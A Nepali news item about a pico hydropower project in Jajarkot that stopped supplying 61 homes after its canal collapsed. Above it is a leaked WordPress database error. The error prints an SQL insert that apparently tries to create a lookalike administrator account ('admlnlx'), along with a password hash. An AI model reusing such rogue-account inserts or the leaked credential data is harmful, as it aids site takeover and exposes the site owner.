WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBNaC5KZzi82NsITWnzJ9jtboIUMXh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 12:35:31', '', 'admlnlx', 'admlnlx')
जाजरकोट, माघ २३-
जाजरकोटकोे गर्खाकोट– ९ मा रहेको छिर्क खोलामा निर्माण भएको पिको जल विद्युत् आयोजना उद्घाटन भएको एक महिना नपुग्दै नहर भत्किएपछि विद्युत सेवा बन्द भएको छ ।
नहर भत्किएकाले आइतबार बिहानदेखि विद्युत् सेवा अवरुद्ध भएको हो । चार दशमलव पाँच किलोवाट क्षमताको आयोजना सञ्चालनमा आएपछि ६१ घरमा बिजुली बलेको थियो । विद्युत् उपभोक्ता समितिका उपाध्यक्ष हर्कबहादुर बुढाका अनुसार नहर मर्मत गर्न आर्थिक अभाव भएको र तत्काल कतैबाट सहयोग हुने स्थिथि नभएकाले विद्युत् सेवा नियमित गर्न समय लाग्ने जानकारी दिनुभयो । निर्माणको क्रममा गुणस्तरमा ख्याल नगरेकाले समस्या आएको स्थानीय बासिन्दाले बताएका छन् ।- रासस